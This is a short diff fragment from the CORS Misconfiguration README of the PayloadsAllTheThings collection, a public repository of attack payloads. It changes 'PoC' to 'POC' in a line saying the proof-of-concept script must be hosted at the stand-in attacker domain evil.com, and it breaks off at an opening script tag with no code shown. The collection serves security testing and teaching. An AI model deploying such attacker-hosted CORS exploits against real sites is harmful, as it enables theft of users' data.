swisskyrepo/PayloadsAllTheThings/CORS Misconfiguration/README.md

 ```

 #### Proof of Concept
-This PoC requires that the respective JS script is hosted at `evil.com`
+This POC requires that the respective JS script is hosted at `evil.com`

 ```js
 <script>